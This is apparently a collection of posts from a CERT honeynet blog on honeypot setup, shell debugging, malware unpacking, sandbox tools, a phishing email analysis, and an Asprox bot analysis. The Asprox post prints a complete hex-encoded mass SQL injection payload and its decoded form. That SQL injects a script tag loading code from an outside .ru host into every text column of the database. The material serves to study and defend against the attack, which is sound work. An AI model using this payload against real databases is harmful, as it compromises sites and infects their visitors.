Dionaea: Auto Start Script on Ubuntu

Getting Dionaea to run should be very straightforward for most people.  One of the thing we need for our project is  As for us, to get our Dionaea appliance running properly, one the feature we need is to get Dionaea service running when the OS is booting. Below is the script for it (shameless ripped off from Nepenthes’s script):

#! /bin/sh
### BEGIN INIT INFO
# Required-Start:    $network
# Required-Stop:     $network
# Should-Start:
# Should-Stop:
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
### END INIT INFO

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
DAEMON=/opt/dionaea/bin/dionaea
NAME=dionaea
GROUP=dionaea
CONFIG_FILE="/opt/dionaea/etc/dionaea/dionaea.conf"
#dionaea -u nobody -g nogroup -r /opt/dionaea/ -w /opt/dionaea -p /opt/dionaea/var/dionaea.pid
DAEMON_OPTS="-u $NAME -g $GROUP -l all,-debug -L '*'  -w /opt/dionaea -c $CONFIG_FILE"

test -x $DAEMON || exit 0

set -e

case "$1" in
  start)
	echo -n "Starting $NAME: "
	start-stop-daemon --start --quiet --oknodo --pidfile /opt/dionaea/var/$NAME.pid \
	--background --make-pidfile --exec $DAEMON -- $DAEMON_OPTS
	echo "$NAME."
	;;
  stop)
	echo -n "Stopping $NAME: "
	start-stop-daemon --stop --quiet --oknodo --pidfile /opt/dionaea/var/$NAME.pid \
	--signal 15 --exec $DAEMON
	echo "$NAME."
	;;
  restart|force-reload)
	echo -n "Restarting $NAME: "
	start-stop-daemon --stop --quiet --oknodo --pidfile /opt/dionaea/var/$NAME.pid \
	--signal 15 --exec $DAEMON
	sleep 1
	start-stop-daemon --start --quiet --oknodo --pidfile /opt/dionaea/var/$NAME.pid \
	--background --make-pidfile --exec $DAEMON -- $DAEMON_OPTS
	echo "$NAME."
	;;
  *)
	N=/etc/init.d/$NAME
	echo "Usage: $N {start|stop|restart|force-reload}" >&2
	exit 1
	;;
esac

exit 0

Copy the script, rename it to dioanea and move it to /etc/init.d/

On Ubuntu, we need to activate this to reflect our desire init level for Dionaea script. Lets use defaults init :

shell$sudo update-rc.d dionaea defaults

To execute or start the dionaea service, just simply:

shell$sudo /etc/init.d/dionaea start

Crontab Problem

There was a problem in one of my bash scripts. The script (master-universe) is the starter of another script. It should be run daily at midnight to check  if a child process, which is the manager of the another script, is still running. If the child process is somehow dead, it will (re) execute the child.

theInduk.sh
	(call)  ---  master-universe.sh
		   (call)  ---   child_proses.sh

I tested the script with bash and /bin/sh, it seems to be  working just fine.

 kill_master() {
for pid in `ps aux| grep -v grep |grep 'master-universe' |awk '{print $2}'`; do
echo "Killing pid: " $pid
kill -9 $pid
done
}

The function above is the source of the problem. When it execute using crontab, it refused go inside the for loop as if  the process master-universe does not exist (checked via ps aux from cli).

My first thought was /bin/sh can’t interpret the for syntax for whatever reasons. But thats not true because when run it from the console

sh ./theInduk.sh

everything seemed allright.

After spending more than 1 hour debugging and nearly thrashing my mouse to the 19”  lcd, I realized it! I added a line to the code, and it revealed everything.

kill_master() {
ps aux > /tmp/napeTakSama.txt
for pid in `ps aux| grep -v grep |grep ‘master-universe’ |awk ‘{print $2}’`; do
echo “Killing pid: ” $pid
kill -9 $pid
done
}

Result of /tmp/napeTakSama.txt

root    809  0.0  0.0  5688   996  v3  Is+   2Jul09   0:00.00 /usr/libexec/gett
root    810  0.0  0.0  5688   996  v4  Is+   2Jul09   0:00.00 /usr/libexec/gett
root    811  0.0  0.0  5688   996  v5  Is+   2Jul09   0:00.00 /usr/libexec/gett
root    812  0.0  0.0  5688   996  v6  Is+   2Jul09   0:00.00 /usr/libexec/gett
root    813  0.0  0.0  5688   996  v7  Is+   2Jul09   0:00.00 /usr/libexec/gett
root  60580  0.0  0.0 20440  1624  p0  I     6Jan10   0:00.00 su
root  60581  0.0  0.1 10104  2712  p0  I+    6Jan10   0:00.02 _su (csh)
xmen 83289  0.0  0.1  9016  2248  p0  Is   21Jul09   0:00.04 /usr/local/bin/ba
root    941  0.0  0.1 10104  3104  p1  Is    2Jul09   0:00.10 /bin/csh
root  61684  0.0  0.1  9456  2980  p1  S+    6Jan10   0:11.10 tcpdump -avvv -i
root    971  0.0  0.1 10104  3084  p2  Is+   2Jul09   0:00.15 /bin/csh
xmen  3960  0.0  0.1  9016  2176  p3  Is    3Jul09   0:00.01 -bash (bash)
xmen  3966  0.0  0.0  8144  1716  p3  S+    3Jul09   0:23.29 screen -l
xmen  3970  0.0  0.1  9016  2176  p4  Is+   3Jul09   0:00.06 /usr/local/bin/ba
xmen  4029  0.0  0.1  9016  2252  p5  Is    3Jul09   0:00.12 /usr/local/bin/ba

Can you see the problem?

Yup.. the result of ps aux above is somehow truncated to 81 characters for each line and therefore my grep cannot find the master-universe string.

The Solution?
Instead of ps aux I just used ‘ps ax’ and filtered the first column.

for pid in `ps ax| grep -v grep |grep 'master-universe' |awk '{print $1}'`; do

The above code worked as I expected.

This happen on FreeBSD 7.2. (I hate bsd!) I tried the original code on Linux (Ubuntu Karmic) and  guess what? The result is as expected from a well behaved innocent OS.

(Note to myself: Remember, always love Linux).

OllyScript – Automating detection and unpacking the Conficker Worm Variant B/C

In order to bring the problem of extracting unpacking code into the realm of decidability,  MyCERT had been working on  automating the unpacking script in an assembly-like language. The script, called OllyScript,  can be used to unpack malicious worm Win32/Conficker B and Win32/Conficker C. OllyScript is the scripting language plugin for OllyDbg.  It simulates user’s debugging session within OllyDbg.

OllyScript is important when dealing with PE packer; it can take hours to unpack a single protector where users no need to do it too often. The unpacked code extraction algorithm as URL [https://blog.honeynet.org.my/mirror/Unpack_ConfickerBC.txt] operates by identifying the version of Conficker worm of an input binary executable file. An automating uncompressing code is executed to unpack the obfuscation code.

The instruction on how to run the “Unpack_ConfickerBC.txt” using OllyDBG please refer to previous post [https://blog.honeynet.org.my/?p=81].

MyKotakPasir: Solved major problem during automated analysis.

MyKotakPasir 2 is a malware sandbox developed by Malware Research Center at MyCERT. A lot of  improvements have been introduced since the first version. For instance, in the previous version, 2 different programming languages, namely Python and VB, were used to handle analysis work.

Due to some teething problems with Python,  I have changed everything to  Visual Basic to make it more consistent.  This also means that  the analysis  is done by single process which is much stable and faster *.

Here’s a screenshot.

MyKotakPasir 2 in isolated environment

Major changes made:

+ Remove python script
+ Add anti-termination on mykotakpasir core engine.
+ All reports and database contact made by core engine.
+ Code optimization save almost 50% times during analyzing process.
+ Revert to clean snapshot now made by core engine.
+ Multi OS platform supported (previously only on Linux) that running VirtualBox.
+ Change parameter line for start/revert snapshot to new Oracle VirtualBox.
+ New web interface.

Other new features will be available on next update.

MySuntikanAPI

MyCERT have been developing a few analysis tools for reversing. MySuntikanAPI is still in alpha version and need more improvement. Every hooked API will capture detail information to make sure we don’t miss any behavior especially in malware sample.

API Hooking is same as IAT hooking. One of the tools that we created is called ‘MySuntikanAPI‘. It is used  to hook and collect API information from the process. Here it is a sample result after hooking notepad.exe.

Every hooked API from the targeted process will hook the buffer (if so) to retrieve information such as GetTempFileName(), CreateFile(), DeleteFileA() and so on. Save the log file for analyzing it later. This tools will be implement into our sandbox as a part of its component. The tools comes with 2 files. MySuntikanAPI.exe (injector) and MySuntikanAPI.dll (to be injected).

Hooking pBot

I’m working on analyzing remote file inclusion (RFI) code. For pBot class which uses  an IRF server as their command and control (C&C) ,  we are interested to get the IP addresses of the C&C,  the channel name and  the nickname used to connect to irc server.

Below are sample of output:

ok!
(host=irc.server_name.net, port=6667, , , 30)
( 1160 , “USER inul07429 127.0.0.1 localhost :Linux phpsBox 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 ” ,  )
( 1160 , “NICK [E]inul92112 ” ,  )
( 1160 , “MODE [E]inul92112 +ps” ,  )
( 1160 , “JOIN #knk !anime” ,  )
( 1160 , “PRIVMSG #trouxanime :[uname!]: Linux phpsBox 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 (safe: off)” ,  )
( 1160 , “PRIVMSG #trouxanime :[vuln!]: http://” ,  )
( 1160 , “NICK [E]inul97869” ,  )
( 1160 , “PONG :1508829909” ,  )
( 1160 , “PONG :1508829909” ,  )
( 1160 , “PONG :1508829909” ,  )
( 1160 , “PONG :1508829909” ,  )

Yet another PDF Analyz3r

[A blog post by Ahmad Azizan, practical student @ MyCERT]

Until today, the attack on client-side through Adobe Reader’s vulnerabilities are not slowing down. Even though the patches for known Adobe Reader’s vulnerabilities has been released to public for quite a moment, but there is still a lot of  website that hosted the malicious PDF files to unsuspecting users.

A malicious PDF file usually embedded with JavaScript to exploit Adobe Reader’s vulnerabilities, namely like util.printf, Collab.getIcon, and Collab.collectEmailInfo. These exploits are usually crafted to allow buffer overflow when the PDF file is opened. Consequently, a payload that is in the JavaScript will be executed allowing the malware (i.e. bot) to be downloaded and installed silently in user’s PC.

Analyzing PDF files is a quite challenging task (to some!) without the tools and basic understanding of PDF component structure, since the attacker have hundreds of obfuscation techniques to make their malicious code harder to read. When the analyze process took place, the embedded JavaScript usually be deflated and encoded into unreadable content, thus needing suitable tools to inflate and decode for further analysis.

As to make my analyzing process easier, I am currently developing an application to automatically analyze PDF file, which called PDF analyz3r. PDF analyz3r is written in ruby-language which automatically deflates the PDF content, interpret JavaScript code inside the PDF file, and subsequently get the payload to determine its behavior and potential URL of malware download. PDF analyz3r currently support inflation for single or cascaded filters of FlateDecode, ASCIIHexDecode, and ASCII85Decode.

PDF analyz3r is currently under heavy development, however, it is still usable, and from my test result, out of 29, 24 malicious PDF file were successfully analyzed and detected.

Here are some of the sample analyses (uncompress passwd : analyz3r):

Send me an email if you have sample to analyze with PDF analyz3r. I would be pleased to give you the output. Until next time, always make sure you are surfing with updated gears. In whatever you do, always try to be safe

Attention – Mail server upgrade

Attention!

On October 22, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour.

The changes will concern security, reliability and performance of mail service and the system as a whole.

For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.

This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That’s all.

http://updates.<some-domain>.secure.<some-evil-domain>/ssl/id=7906947-<some-address>-list@<some-domain>-patch263.exe

Thank you in advance for your attention to this matter and sorry for possible inconveniences.

System Administrator

Nice trick! But no thanks! Here are some details of the downloaded binary:

File name: patch.exe

MD5 sum: 0ee4f395dd071f169e95e34454bbf446

ThreatExpert Summary: Threat characteristics of ZBot - a banking trojan that disables firewall, steals sensitive financial data (credit card numbers, online banking login details), makes screen snapshots, downloads additional components, and provides a hacker with the remote access to the compromised system.

I assumed that it was a targeted attack, and the attacker created the subdomains that look alike the real servers for each email that they send.. But I was totally wrong..

No matter what subdomain you use (or even without subdomain), and what ever file you request as long as the file extension is .EXE, the server will still going to response with HTTP/1.1 301 Moved Permanently and redirect you to the binary file.


WGET with no subdomain


WGET with random file name

More technical information on the downloaded binary:

  1. VirusTotal
  2. ThreatExpert

Mass SQL Injection And Asprox Bot

Asprox is one of the botnet that implements mass sql injection to inject malicious *.js script into MSSQL database server. Normally Asprox bot will search for any vulnerable (sql injection, of course) *.asp script to inject the malicious *.js script and iframe into database. Typical sql injection is similar to log below:

GET /page.asp?id=425;d EcLaRe @s VArcHAr(4000);sET @s=cASt(0x4445636C615245204054205661 724348415228323535292C40632056417263 6841722832353529204465436C4152652074 41626C655F437572736F7220437552736F72 20664F522073454C45637420612E6E416D65 2C622E6E414D452066726F6D207359734F62 6A4563547320612C735973636F4C756D6E73 206220774845726520412E69643D622E4964 20614E4420612E78547970653D2755272061 4E642028622E78745950653D3939206F7220 422E78545970453D3335204F7220622E7874 5950453D323331206F5220622E5874595065 3D31363729206F50456E207441426C655F43 7572734F72204665544368206E4558742066 724F6D205441426C655F637572734F522069 4E744F2040542C4043205748494C45284040 46457443685F5354415475533D3029204245 47696E20657865432827757044417465205B 272B40542B275D20534574205B272B40432B 275D3D527452696D28434F6E564552542856 4152636841522834303030292C5B272B4043 2B275D29292B434173742830783343373336 333732363937303734323037333732363333 443638373437343730334132463246373737 373737324536323631364536453635373237 343245373237353246363136343733324536 413733334533433246373336333732363937 303734334520417320564152634841722835 3129292729204645546348204E4558542066 726F6D207441626C655F435572734F722049 4E744F2040542C404320456E6420434C6F73 45207461626C455F635572736F5220644541 6C4C4F63617465207441624C655F43757273 6F7220 AS vaRcHaR(4000));eXeC (@s);--
HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
*/*;q=0.1
Accept-Language: en-gb
Accept-Encoding: deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20090728 Firefox/1.5.0 Opera 9.25
Host: www.xxxx.com
Connection: Close

It’s a little bit annoying to decode all the hex chars. It’s obvious that the sql injection input is about to bypass string-based content filtering :). Out of curiosity about this sql injection, i managed to code a little ruby code to decode the sql injection (using normal trick by converting hex input via cast function). Below is the result, sample usage of the code and sample output:

shell>$ruby hex2ascii.rb '4445636C615245204054205661 724348415228323535292C40632056417263 6841722832353529204465436C4152652074 41626C655F437572736F7220437552736F72 20664F522073454C45637420612E6E416D65 2C622E6E414D452066726F6D207359734F62 6A4563547320612C735973636F4C756D6E73 206220774845726520412E69643D622E4964 20614E4420612E78547970653D2755272061 4E642028622E78745950653D3939206F7220 422E78545970453D3335204F7220622E7874 5950453D323331206F5220622E5874595065 3D31363729206F50456E207441426C655F43 7572734F72204665544368206E4558742066 724F6D205441426C655F637572734F522069 4E744F2040542C4043205748494C45284040 46457443685F5354415475533D3029204245 47696E20657865432827757044417465205B 272B40542B275D20534574205B272B40432B 275D3D527452696D28434F6E564552542856 4152636841522834303030292C5B272B4043 2B275D29292B434173742830783343373336 333732363937303734323037333732363333 443638373437343730334132463246373737 373737324536323631364536453635373237 343245373237353246363136343733324536 413733334533433246373336333732363937 303734334520417320564152634841722835 3129292729204645546348204E4558542066 726F6D207441626C655F435572734F722049 4E744F2040542C404320456E6420434C6F73 45207461626C455F635572736F5220644541 6C4C4F63617465207441624C655F43757273 6F7220'
[+] encoded string : DEclaRE @T VarCHAR(255),@c VArchAr(255) DeClARe tAble_Cursor CuRsor fOR sELEct a.nAme,b.nAME from sYsObjEcTs a,sYscoLumns b wHEre A.id=b.Id aND a.xType='U' aNd (b.xtYPe=99 or B.xTYpE=35 Or b.xtYPE=231 oR b.XtYPe=167) oPEn tABle_CursOr FeTCh nEXt frOm TABle_cursOR iNtO @T,@C WHILE(@@FEtCh_STATuS=0) BEGin exeC('upDAte ['+@T+'] SEt ['+@C+']=RtRim(COnVERT(VARchAR(4000),['+@C+']))+CAst(0x3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E As VARcHAr(51))') FETcH NEXT from tAble_CUrsOr INtO @T,@C End CLosE tablE_cUrsoR dEAlLOcate tAbLe_Cursor

Since in this sql injection, it used double payload of hex trick. So i need to re-execute the code again for this one:

CAst(0x3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E)
shell>$ ruby hex2ascii.rb 3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E
[+] encoded string :

all the output need to concat again with previous string like AS vaRcHaR(4000));eXeC (@s);–. So the final sql statement will look similar to this:

d EcLaRe @s VArcHAr(4000);sET @s=DEclaRE @T VarCHAR(255),@c VArchAr(255) DeClARe tAble_Cursor CuRsor fOR sELEct a.nAme,b.nAME from sYsObjEcTs a,sYscoLumns b wHEre A.id=b.Id aND a.xType='U' aNd (b.xtYPe=99 or B.xTYpE=35 Or b.xtYPE=231 oR b.XtYPe=167) oPEn tABle_CursOr FeTCh nEXt frOm TABle_cursOR iNtO @T,@C WHILE(@@FEtCh_STATuS=0) BEGin exeC('upDAte ['+@T+'] SEt ['+@C+']=RtRim(COnVERT(VARchAR(4000),['+@C+']))+CAst( As VARcHAr(51))') FETcH NEXT from tAble_CUrsOr INtO @T,@C End CLosE tablE_cUrsoR dEAlLOcate tAbLe_Cursor

From the output, we knew that attacker try to inject into the database by injecting <script src=http://www.bannert.ru/ads.js>. This script will later on will be used as iframe on the compromised database/web server to silently fetch a ads.js. Unfortunately, the ads.js is no longer available during this blog entry posted.

Below is the simple ruby code for the decoding hex values. Your need to supply input within cast functions.

#!/usr/bin/ruby
#copy this code and save as hex2ascii.rb
def usage
   puts "[+] usage: ruby hex2ascii input_string"
end
data=ARGV[0]
result=Array.new
if data==nil
   usage()
else
   data=data.delete(" ")
   data.scan(/../).each{|a|
      puts a
      result << a.hex.chr
   }
   puts "[+] encoded string : #{result.to_s}"
end

Here is how u can use the code:

shell>$ ruby hex2ascii.rb '3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E'
[+] encoded string :

* don’t forget to use quote (‘ ‘) when key in your input.